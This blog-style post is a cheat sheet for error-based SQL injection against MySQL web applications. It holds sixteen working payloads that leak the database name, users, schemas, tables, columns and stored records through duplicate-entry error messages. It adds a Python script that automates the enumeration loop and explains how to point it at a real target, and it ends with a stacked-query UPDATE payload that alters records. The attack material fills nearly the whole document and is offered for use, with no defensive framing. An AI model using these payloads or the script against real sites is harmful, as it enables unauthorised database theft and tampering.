MySQL (error based) blind SQLi cheat sheet, 2012 is here!!!
10 January 2012
Quick & Dirty MySQL (Error Based) Blind SQLi Cheat Sheet
So, you have a web application vulnerable to blind SQL injection (test the parameter with a single quote ' ) and you need quick & dirty cheats to dig deeper.
Note: every value is fetched through Hex(cast(... as char)), so it comes back as a hex string; this keeps the query reliable and avoids bad-character and formatting problems (for example a 0x00 as the last byte of a fetched value). Decode the hex to get the text. The leak itself works like this: floor(rand(0)*2) inside a group by makes MySQL look up one key and then insert a different one in its grouping temp table, which ends in a "Duplicate entry '~'HEX'~1' for key 'group_key'" error, and that error message carries our ~'...'~ framed value. The application therefore has to display MySQL error messages; without that, these payloads tell you nothing. MySQL also cuts long key values off in that error message, so for long strings take the hex in pieces with mid(). These payloads rely heavily on the information_schema database, which exists from MySQL 5.0 on. If you don't get the desired result, the remote server most likely runs an older version without it.
These payloads are crafted only for error-based MySQL blind SQL injections in string-type parameters (the injection point sits inside a quoted string, hence the leading ' and the closing and '1'='1). If you know what I'm talking about, go play!
No more crap, straight to the point.
1. To test blind injection (the page should come back unchanged with this, and differently with ' and 'x'='y)
Code:
' and 'x'='x
2. To select the current database (output is hexadecimal; decode it to ASCII)
Code:
' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
3. To find the current user
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
4. To find the MySQL version
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
5. Find current database
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
6. To find the system user
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
7. To find the hostname
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
8. To find the installation directory
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
9. To find the DB user (grantee)
Note: Increment the first LIMIT argument (0, 1, 2, ...) to list further grantees; when the Duplicate entry error stops appearing, there are no more.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
10. To find the databases
Note: Replace n with 0, 1, 2, ... and keep going as long as the error comes back with a value between the ~' '~ markers; a normal page (no error) means n has passed the last database.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
11. To count the number of tables in the selected database
Note: Note this count as n. Replace 0xhex_code_of_database_name with the hex encoding of the database name (e.g. 0x74657374 for the database test). The count itself is not wrapped in Hex() here, so it comes back as plain digits.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
12. To get the table names in the selected database
Note: Run the query once per table with the LIMIT offset set to 0, 1, ... n-1 (the sheet writes this as m-n). Replace 0xhex_code_of_database_name with the hex encoding of the database name, as in item 11.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
13. To get the number of columns in the selected table
Note: Note this count as n. Replace the two 0x... placeholders with the hex encodings of the database name and the table name.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
14. To get the column names of the selected table
Note: LIMIT offset 0, 1, ... n-1 as before (written m-n). Replace the two 0x... placeholders with the hex encodings of the database name and the table name.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
15. To count the number of rows in the selected table
Note: Remember this count as n. Here database_name and table_name are the plain identifiers, because the query reads from the table itself rather than from information_schema.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `database_name`.table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
16. To fetch records from a selected column
Note: LIMIT offset 0, 1, ... n-1 as before (written m-n). database_name, table_name and column_name are plain identifiers; the values come back hex-encoded.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM `database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
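The whole enumeration loop of items 10 to 16 as an added example in Python (this is not part of the original cheat sheet): it produces the 0x... literals for the placeholders, builds the payload for a given LIMIT offset, pulls the ~'...'~ framed value out of the Duplicate entry error and decodes the hex, and keeps incrementing n until the marker disappears. The HTTP request is left to the reader (pass your own send(payload) function); fake_server is a constructed stand-in that answers the way a PHP page echoing mysql_error() would, so the script runs offline. All function names here are this example's own.

```python
import re

# Payload skeleton from the cheat sheet. {expr} is any scalar expression: version(),
# database(), or a "(SELECT ... LIMIT n,1)" subquery. concat() frames the value as ~'...'~
# so it can be located in the "Duplicate entry '...' for key 'group_key'" error that
# floor(rand(0)*2) together with group by provokes.
PAYLOAD = (
    "1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,"
    "{expr},0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x "
    "from information_schema.tables group by x)a) and '1'='1"
)
MARKER = re.compile(r"~'([^']*)'~")


def sql_hex(name: str) -> str:
    """0x... literal for the table_schema=0x... placeholders; sql_hex('test') -> 0x74657374."""
    return "0x" + name.encode("utf-8").hex()


def build_payload(expr: str, hexed: bool = True) -> str:
    """hexed=True mirrors the sheet's Hex(cast(... as char)); counts are sent un-hexed."""
    if hexed:
        expr = f"Hex(cast({expr} as char))"
    return PAYLOAD.format(expr=expr)


def schema_payload(n: int) -> str:  # item 10
    return build_payload(
        f"(SELECT distinct schema_name FROM information_schema.schemata LIMIT {n},1)")


def table_payload(db: str, n: int) -> str:  # item 12
    return build_payload(
        f"(SELECT distinct table_name FROM information_schema.tables "
        f"WHERE table_schema={sql_hex(db)} LIMIT {n},1)")


def column_payload(db: str, table: str, n: int) -> str:  # item 14
    return build_payload(
        f"(SELECT distinct column_name FROM information_schema.columns "
        f"WHERE table_schema={sql_hex(db)} AND table_name={sql_hex(table)} LIMIT {n},1)")


def row_payload(db: str, table: str, column: str, n: int) -> str:  # item 16
    return build_payload(f"(SELECT `{column}` FROM `{db}`.`{table}` LIMIT {n},1)")


def table_count_payload(db: str) -> str:  # item 11; the count arrives as plain digits
    return build_payload(
        f"(SELECT count(table_name) FROM information_schema.tables "
        f"WHERE table_schema={sql_hex(db)})", hexed=False)


def extract_marker(response: str):
    """Text between ~' and '~ in the error page, or None when there is no marker
    (the subquery returned no row, i.e. n has run past the last entry)."""
    m = MARKER.search(response)
    return m.group(1) if m else None


def decode_hex(marker: str) -> str:
    """Undo Hex(cast(...)); MySQL emits uppercase hex, bytes.fromhex accepts either case."""
    return bytes.fromhex(marker).decode("utf-8", errors="replace")


def enumerate_values(send, make_payload, limit: int = 1000) -> list:
    """The 'keep incrementing n' loop of items 10, 12, 14 and 16. send(payload) returns the
    response body; make_payload(n) is schema_payload or a lambda binding db/table/column."""
    found = []
    for n in range(limit):
        raw = extract_marker(send(make_payload(n)))
        if raw is None:
            break
        found.append(decode_hex(raw))
    return found


def fake_server(values):
    """Constructed stand-in for the vulnerable page so this runs offline: the payload with
    LIMIT n gets a Duplicate entry error carrying values[n]; past the end, a normal page."""
    def send(payload: str) -> str:
        n = int(re.search(r"LIMIT (\d+),1\)", payload).group(1))
        if n < len(values):
            hexed = values[n].encode("utf-8").hex().upper()
            return f"Duplicate entry '~'{hexed}'~1' for key 'group_key'"
        return "<html><body>search results</body></html>"
    return send


if __name__ == "__main__":
    srv = fake_server(["information_schema", "test"])  # constructed sample database list
    print(enumerate_values(srv, schema_payload))       # ['information_schema', 'test']
    print(enumerate_values(srv, lambda n: table_payload("test", n)))
    print(table_count_payload("test"))
```

Against a real target, replace fake_server with a function that sends the payload in the vulnerable parameter and returns the response body; enumerate_values stops by itself at the first response without the ~'...'~ marker, which is exactly the "no more error" condition the notes above describe. For the count payloads (items 11, 13, 15) read extract_marker() directly, since those values are not hex-encoded.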
17. Update a record in the selected column
Note: This one is a stacked query, so it only works when the application executes the statement through an API that accepts several statements at once (PHP's mysqli_multi_query, for example); the usual single-statement calls such as mysql_query() and mysqli_query() reject it. The 0x... placeholders are hex encodings of the new and old values, as before. Note the trailing space after --: MySQL only treats -- as a comment when whitespace follows it, otherwise the original closing quote breaks the query (# works as an alternative).
Code:
1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHERE column_name=0xhex_code_of_old_record_value-- 
I will update the cheat sheets for other database servers too in separate posts. Keep watching. Till then take care and bye.